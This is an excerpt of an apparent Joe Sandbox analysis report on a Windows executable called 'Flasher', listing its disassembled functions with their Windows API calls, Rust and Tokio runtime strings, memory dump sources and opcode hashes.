Function 00007FF6D35DF7C0 Relevance: 7.6, APIs: 5, Instructions: 133filememoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF6D35DF907
memset.VCRUNTIME140 ref: 00007FF6D35DF92F
FindFirstFileW.KERNEL32 ref: 00007FF6D35DF93A
FindClose.KERNEL32 ref: 00007FF6D35DF949
HeapFree.KERNEL32 ref: 00007FF6D35DF9E0

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: CloseFind$FileFirstFreeHandleHeapmemset
String ID:
API String ID: 1768811725-0
Opcode ID: 8bf0855bdfe87e0e73fa9109cd073f07444acfbc9c5f6b55676b1235ee4701f7
Instruction ID: 0a5086fc3d1d4d1ba50f666ba595ca9029a611610b6b60855dca67ff8c7675e1
Opcode Fuzzy Hash: 8bf0855bdfe87e0e73fa9109cd073f07444acfbc9c5f6b55676b1235ee4701f7
Instruction Fuzzy Hash: A4517537A04B8585E7748F61F8453ADB3A1FB45798F104226DE6D9BB98DF3C9195C300

Function 00007FF6D35DC360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80filenativesynchronizationCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL ref: 00007FF6D35DC3A4
WaitForSingleObject.KERNEL32 ref: 00007FF6D35DC3B9
RtlNtStatusToDosError.NTDLL ref: 00007FF6D35DC3E4

Strings

, xrefs: 00007FF6D35DC394

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ErrorFileObjectReadSingleStatusWait
String ID:
API String ID: 3583596364-3916222277
Opcode ID: 70bbf5f65f15521e0d3843ac71961e27590b032ae2c85b0bda538562b7446595
Instruction ID: cd8cc15ee92ce833891fc09c1de226d9b23cf96049380d9b0adc4ef058f3299e
Opcode Fuzzy Hash: 70bbf5f65f15521e0d3843ac71961e27590b032ae2c85b0bda538562b7446595
Instruction Fuzzy Hash: 1D21C822F14A558AF750CB70E8423AD63A1EB98358F548532E98DE7B98EF3CD5E58340

Function 00007FF6D3550B9D Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 329memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,?,-8000000000000000,?,?,?,?,00007FF6D355181A), ref: 00007FF6D3550C27
HeapFree.KERNEL32(?,00000000,?,-8000000000000000,?,?,?,?,00007FF6D355181A), ref: 00007FF6D3550C76

Strings

requested capacity too large, xrefs: 00007FF6D3550FEA
header map at capacity, xrefs: 00007FF6D3551C75

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: header map at capacity$requested capacity too large
API String ID: 3298025750-1945430686
Opcode ID: cbaefdbfe7de191d29f4a13b2babd8b6420e423f3e7f25d2920b63507607956a
Instruction ID: 68dbdbcbc8891be77b67cd771fcbeb53fdf11d5be9e3bc3e6131df0ef7682183
Opcode Fuzzy Hash: cbaefdbfe7de191d29f4a13b2babd8b6420e423f3e7f25d2920b63507607956a
Instruction Fuzzy Hash: C4C11962B15A5942EA658F16A80277DA361FF45BD4F049232DE4EA7794EF3CF4A1C300

Function 00007FF6D3577C87 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 443filenativeCOMMON

Download Yara Rule

APIs

NtDeviceIoControlFile.NTDLL ref: 00007FF6D3577E4D
RtlNtStatusToDosError.NTDLL ref: 00007FF6D3577E68

Part of subcall function 00007FF6D35CD7B8: HeapFree.KERNEL32 ref: 00007FF6D35CD802

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D35781E2, 00007FF6D3578220, 00007FF6D357830E

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ControlDeviceErrorFileFreeHeapStatus
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 1661082384-2333694755
Opcode ID: f2c61478c6225c396e338b96875407f66e3448902ddb68572fba0718f547a96d
Instruction ID: c8f28dc740cba99ee83cf0bbfbe0aa2b18bdaebed85cc7a1925324d934364e8b
Opcode Fuzzy Hash: f2c61478c6225c396e338b96875407f66e3448902ddb68572fba0718f547a96d
Instruction Fuzzy Hash: A202F1B2E19B8A82EA508F15E84667EA7A0FB45B84F558033DE9D937A4DE3CE055C700

Function 00007FF6D35D4818 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

127.0.0.1:34254, xrefs: 00007FF6D35D482B

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
String ID: 127.0.0.1:34254
API String ID: 0-1314517743
Opcode ID: 310e91a4f1b053f00417cb1f169934d2a2c346be95e19224e15c4f066d43485b
Instruction ID: 18aecf36c3e19f59c1b91b98cbd717398528241ce490b44080d779ac306185c3
Opcode Fuzzy Hash: 310e91a4f1b053f00417cb1f169934d2a2c346be95e19224e15c4f066d43485b
Instruction Fuzzy Hash: DC210661B1D68A82F7A46B36E8077BDA6A0EFC4740F554033DA5CE2795DE3CE462C710

Function 00007FF6D354E215 Relevance: 5.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,00007FF6D361173A), ref: 00007FF6D354E255

Part of subcall function 00007FF6D35EFED0: GetProcessHeap.KERNEL32(0000000E,?,?,00007FF6D353370B,?,?,?,?), ref: 00007FF6D37388C1

memset.VCRUNTIME140(?,?,?,00007FF6D361173A), ref: 00007FF6D354E283
memset.VCRUNTIME140(?,?,?,00007FF6D361173A), ref: 00007FF6D354E2B1
memset.VCRUNTIME140(?,?,?,00007FF6D361173A), ref: 00007FF6D354E2E6

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memset$HeapProcess
String ID:
API String ID: 3537884723-0
Opcode ID: 7e9ccf7b0d4d3f2a807f73d60cb1f6886053054470657c71001901ef77cadb26
Instruction ID: 1498b2dd52df8d7ebe15b8baa983dc5832d296ba3fffe2d2a152738d1f97ac45
Opcode Fuzzy Hash: 7e9ccf7b0d4d3f2a807f73d60cb1f6886053054470657c71001901ef77cadb26
Instruction Fuzzy Hash: 9241E662B06A9502F75ED762A8127FD5283DBC8384F09C439DD8D977CADDBD94E28300

Function 00007FF6D35F83DC Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 379COMMON

Download Yara Rule

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D35F892C
A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF6D35F840D

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$called `Result::unwrap()` on an `Err` value
API String ID: 0-3163332627
Opcode ID: 6d5b52a3c15cc90fc6bf7c466058691ec5e30a09e2a5f0b33709e93b854540c1
Instruction ID: 6e13c88bc7684041a37bac504fb4a3f42b2fdf5a7bd45ffe6d1a3c2b5f581758
Opcode Fuzzy Hash: 6d5b52a3c15cc90fc6bf7c466058691ec5e30a09e2a5f0b33709e93b854540c1
Instruction Fuzzy Hash: B3F10422B09B4A82EB248F15E4023BEA3A1FB54788F544137DE5E97795DF3CE5A6C340

Function 00007FF6D360D459 Relevance: 3.1, APIs: 2, Instructions: 114COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00007FF6D360D53D
SysFreeString.OLEAUT32 ref: 00007FF6D360D5C0

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: feeeb1ceea73fdf837f8e55b5c2e80a4c52be0fcebe39181f1ec126963adf065
Instruction ID: 9224c0d0474daec890065f879205632d08e908f2e99ac17e05e9e8b9b5a2a525
Opcode Fuzzy Hash: feeeb1ceea73fdf837f8e55b5c2e80a4c52be0fcebe39181f1ec126963adf065
Instruction Fuzzy Hash: 12415F32A19B8282E7248F16F45276EB760FB84784F148136EF9D93B55EF3DD0559700

Function 00007FF6D371D91C Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,00007FF6D371D78A,?,?,00000004,00007FF6D367A0CD), ref: 00007FF6D371D92D
GetSystemInfo.KERNELBASE(?,?,?,?,00007FF6D371D78A,?,?,00000004,00007FF6D367A0CD), ref: 00007FF6D371D939

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: 332866d784f26a8bd4739552e81f22e459a73746ba1fe5aa6a99357519aa9673
Instruction ID: 887bad16ebaf1b02f3fc0dbd6e2c534a02f76df10b079b37df8b774cd359a265
Opcode Fuzzy Hash: 332866d784f26a8bd4739552e81f22e459a73746ba1fe5aa6a99357519aa9673
Instruction Fuzzy Hash: 3601BB25E5984295FB44E721DC530FDA3A2BF95744F844473D00EE32A5DE2CA97AD704

Function 00007FF6D36FB910 Relevance: 2.8, APIs: 2, Instructions: 260COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF6D36FBB0E
memcmp.VCRUNTIME140 ref: 00007FF6D36FBB21

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: ece57d0d4e5d6dd7a11fd600a2a3f8832692d799e2c88e18a08e7fbef6034c89
Instruction ID: d7fc684da95b0208b865a4eab664bfc07bac04e40a355ed062b05ca56f3d5dca
Opcode Fuzzy Hash: ece57d0d4e5d6dd7a11fd600a2a3f8832692d799e2c88e18a08e7fbef6034c89
Instruction Fuzzy Hash: E2B1B062A08AC285FB608B36845227DA7E5FF85B88F184433CF0DE7799DEBCD5619300

Function 00007FF6D357C7E4 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

BCryptGenRandom.BCRYPT ref: 00007FF6D357C829

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: CryptRandom
String ID:
API String ID: 2662593985-0
Opcode ID: c1fa4997b17101d465341b0a31e5a12c182a4889957f8806b8244bce7d5eb717
Instruction ID: bbef3bce27caa540acb912704523d69600bbbf59a1daf956ca2403bc26d46169
Opcode Fuzzy Hash: c1fa4997b17101d465341b0a31e5a12c182a4889957f8806b8244bce7d5eb717
Instruction Fuzzy Hash: EC0144A2B1559511FE555B366806778C5816B88FB0F298236DE3CEB7C2CC3CC8928304

Function 00007FF6D3512398 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000002,?,00007FF6D3512752), ref: 00007FF6D35123FE

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: de6f84b4a938d7710ec262f4d6c3fe2d42db37168e94fa1611a6bf03796e0230
Instruction ID: be7d5f700ce3af267476f542c7e1d595ffcfb87075dd46d94e4cd102332ad3cd
Opcode Fuzzy Hash: de6f84b4a938d7710ec262f4d6c3fe2d42db37168e94fa1611a6bf03796e0230
Instruction Fuzzy Hash: F3012C72619B8586D360CF69F84165EB6E5F784790F248135EBCE83B18DF38D0A1CB00

Function 00007FF6D367809C Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17aa550a2d9927a78b204b78b5e693a5fe0ebc35caadd3715463ef82fa4b9720
Instruction ID: 81b10d436942eafb15053cecf378ff1a55e47dd5cc05c69038128ec88fe80e30
Opcode Fuzzy Hash: 17aa550a2d9927a78b204b78b5e693a5fe0ebc35caadd3715463ef82fa4b9720
Instruction Fuzzy Hash: A5A1F462E09BC281FA659B66944337EE791BF84B95F540132DD0EA7B85DF3CE861A300

Function 00007FF6D35DB520 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32 ref: 00007FF6D35DB628
GetTempPathW.KERNELBASE ref: 00007FF6D35DB63B
GetLastError.KERNEL32 ref: 00007FF6D35DB644
GetLastError.KERNEL32 ref: 00007FF6D35DB65D
HeapFree.KERNEL32 ref: 00007FF6D35DB6DD
HeapFree.KERNEL32(?,?,FFFFFFFF,?,?), ref: 00007FF6D35DB7E6

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D35DB771

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeHeap$PathTemp
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 3689437125-2333694755
Opcode ID: 3f11da1fdb2686e584a360b847a51340d17f67275d6db508c466cf4820c4047d
Instruction ID: 8a5acd0f3ad60158dd68126e37260061cd60852769158910a322d97878811ccb
Opcode Fuzzy Hash: 3f11da1fdb2686e584a360b847a51340d17f67275d6db508c466cf4820c4047d
Instruction Fuzzy Hash: EF61D262A04BCA85EB619F21E8067EDA365BB847A8F444136DE2CA7784DF7CD295C304

Function 00007FF6D35EF470 Relevance: 15.1, APIs: 10, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CancelIo.KERNEL32 ref: 00007FF6D35EF498
GetOverlappedResult.KERNEL32 ref: 00007FF6D35EF4BD
GetLastError.KERNEL32 ref: 00007FF6D35EF4E5
CloseHandle.KERNELBASE ref: 00007FF6D35EF53F
CloseHandle.KERNEL32 ref: 00007FF6D35EF545
GetLastError.KERNEL32 ref: 00007FF6D35EF568
HeapFree.KERNEL32 ref: 00007FF6D35EF5D9
CloseHandle.KERNEL32 ref: 00007FF6D35EF5F6
CloseHandle.KERNEL32 ref: 00007FF6D35EF600
HeapFree.KERNEL32 ref: 00007FF6D35EF60F

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: CloseHandle$ErrorFreeHeapLast$CancelOverlappedResult
String ID:
API String ID: 3987361021-0
Opcode ID: 91bcc67dcc225b22216f181e12c840d2cb27a05f7591a38834909435660ac60a
Instruction ID: 9fa868affa9b9310f5193344dfb0569517b03febf18ee67c99081ccb5cad57c5
Opcode Fuzzy Hash: 91bcc67dcc225b22216f181e12c840d2cb27a05f7591a38834909435660ac60a
Instruction Fuzzy Hash: 58414B27A05F5585E7559F62E8023AC67A0FB98B98F464533DE1CB7798CF38E4A2C340

Function 00007FF6D34F81A5 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 324
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140 ref: 00007FF6D34F81F4

Part of subcall function 00007FF6D35E0DB0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE,00007FF6D34F8440), ref: 00007FF6D35E0ED3
Part of subcall function 00007FF6D35E0DB0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE,00007FF6D34F8440), ref: 00007FF6D35E0EE6
Part of subcall function 00007FF6D35E0DB0: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE,00007FF6D34F8440), ref: 00007FF6D35E0F11

HeapFree.KERNEL32 ref: 00007FF6D34F8288
HeapFree.KERNEL32 ref: 00007FF6D34F84F9
HeapFree.KERNEL32 ref: 00007FF6D34F850F
HeapFree.KERNEL32 ref: 00007FF6D34F853C
HeapFree.KERNEL32 ref: 00007FF6D34F856B

Part of subcall function 00007FF6D35E0300: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE), ref: 00007FF6D35E0476
Part of subcall function 00007FF6D35E0300: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE), ref: 00007FF6D35E048B
Part of subcall function 00007FF6D35E0300: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,-7FFFFFFFFFFFFFEE), ref: 00007FF6D35E04B2

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D34F85FB
stderrstd\src\io\mod.rs, xrefs: 00007FF6D34F8422

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$AddressSingleWake$memset
String ID: called `Result::unwrap()` on an `Err` value$stderrstd\src\io\mod.rs
API String ID: 378572198-1160352639
Opcode ID: a66bfd9075c6ef6ddfe183db1350a9875603c0c362419289e68a77286061ed54
Instruction ID: b4a8f2d1f780777a0a595176b65e0ca7c99d77405c81c4cd340327b36eef4026
Opcode Fuzzy Hash: a66bfd9075c6ef6ddfe183db1350a9875603c0c362419289e68a77286061ed54
Instruction Fuzzy Hash: DFE17022A05F8595EBA09F25D8427ED73A4FB44768F454233CA6CA77A5DF3CD1AAC300

Function 00007FF6D35DD650 Relevance: 12.2, APIs: 8, Instructions: 160fileCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF6D35DD6D1
FindNextFileW.KERNELBASE ref: 00007FF6D35DD6DC
memmove.VCRUNTIME140 ref: 00007FF6D35DD7A0
memmove.VCRUNTIME140 ref: 00007FF6D35DD80C
memmove.VCRUNTIME140 ref: 00007FF6D35DD885
memmove.VCRUNTIME140 ref: 00007FF6D35DD8D1

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove$FileFindNextmemset
String ID:
API String ID: 1082990326-0
Opcode ID: b455f6b7be85c190a1d2ac7295576988526734a853b632a909f1810740c2268e
Instruction ID: 1cd284d97ad7c020a8260dd1f7a49dc78e3039d9a6fc6faf758da0e180a75516
Opcode Fuzzy Hash: b455f6b7be85c190a1d2ac7295576988526734a853b632a909f1810740c2268e
Instruction Fuzzy Hash: 82617CB6A05AC6C9E7718F25D8423EDA3B0FF54758F045122DF589BA95EF38E2A1C300

Function 00007FF6D34F5A8A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D360D277: SysAllocStringLen.OLEAUT32 ref: 00007FF6D360D350

SysFreeString.OLEAUT32 ref: 00007FF6D34F5B43
SysFreeString.OLEAUT32 ref: 00007FF6D34F5B49

Part of subcall function 00007FF6D34F1000: HeapReAlloc.KERNEL32 ref: 00007FF6D34F1226

SysFreeString.OLEAUT32 ref: 00007FF6D34F5C8B
